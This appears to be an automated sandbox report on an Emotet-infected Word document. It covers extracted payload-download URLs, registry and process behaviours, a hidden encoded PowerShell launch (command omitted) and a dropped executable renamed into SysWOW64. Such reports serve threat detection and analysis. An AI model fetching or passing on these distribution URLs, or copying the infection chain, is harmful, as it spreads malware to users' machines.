Analysis
max time kernel: 30s
resource: win10v191014
submitted: 16-01-2020 13:38

Malware Config
Extracted
http://nfaagro.com/web_map/FF/
http://blog.arquitetofabiopalheta.com/cgi-bin/vr1tm/
http://ecrib.e-lyfe.com/21rqvsb/XLkpTvt/
http://www.moestlstudios.com/error/kx8/
http://www.loyss.com/wp-content/uploads/fnf8/
Extracted
emotet
Signatures
Suspicious behavior: AddClipboardFormatListener (1 IoC)
  pid   Process
  4868  WINWORD.EXE

Suspicious use of SetWindowsHookEx (5 IoCs)
  pid   Process
  4868  WINWORD.EXE
  4524  128.exe
  4688  128.exe
  3820  zapiplk.exe
  4320  zapiplk.exe

Enumerates system info in registry (2 TTPs, 3 IoCs)
  description        ioc                                                              Process
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS               WINWORD.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily  WINWORD.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU     WINWORD.EXE

Process spawned unexpected child process (1 IoC)
  description                                                                          pid   pid_target  Process         procid_target
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  4476  5088        Powershell.exe  73

Suspicious use of AdjustPrivilegeToken (1 IoC)
  description              pid   Process
  Token: SeDebugPrivilege  4476  Powershell.exe

Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid   Process
  4476  Powershell.exe

Suspicious use of WriteProcessMemory (3 IoCs)
  description                       pid   Process         procid_target
  PID 4476 wrote to memory of 4524  4476  Powershell.exe  80
  PID 4524 wrote to memory of 4688  4524  128.exe         81
  PID 3820 wrote to memory of 4320  3820  zapiplk.exe     83

Executes dropped EXE (4 IoCs)
  pid   Process
  4524  128.exe
  4688  128.exe
  3820  zapiplk.exe
  4320  zapiplk.exe

Suspicious behavior: EmotetMutantsSpam (1 IoC)
  pid   Process
  4688  128.exe

Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
  description        ioc                                                                      Process
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0         WINWORD.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz   WINWORD.EXE

Drops file in System32 directory (1 IoC)
  description   ioc                                                        Process
  File renamed  C:\Users\Admin\128.exe => C:\Windows\SysWOW64\zapiplk.exe  128.exe
Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ee6a68655969f365cab1a11da6cc630328b88f132adea746561ca8f6102d5199.doc" /o ""
  PID: 4868
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Enumerates system info in registry
  - Checks processor information in registry

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
  Powershell -w hidden -en <base64-encoded command omitted>
  PID: 4476
  - Process spawned unexpected child process
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\128.exe
    "C:\Users\Admin\128.exe"
    PID: 4524
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    - Executes dropped EXE

    C:\Users\Admin\128.exe
      --3a4cf895
      PID: 4688
      - Suspicious use of SetWindowsHookEx
      - Executes dropped EXE
      - Suspicious behavior: EmotetMutantsSpam
      - Drops file in System32 directory

C:\Windows\SysWOW64\zapiplk.exe
  "C:\Windows\SysWOW64\zapiplk.exe"
  PID: 3820
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - Executes dropped EXE

  C:\Windows\SysWOW64\zapiplk.exe
    --e1427445
    PID: 4320
    - Suspicious use of SetWindowsHookEx
    - Executes dropped EXE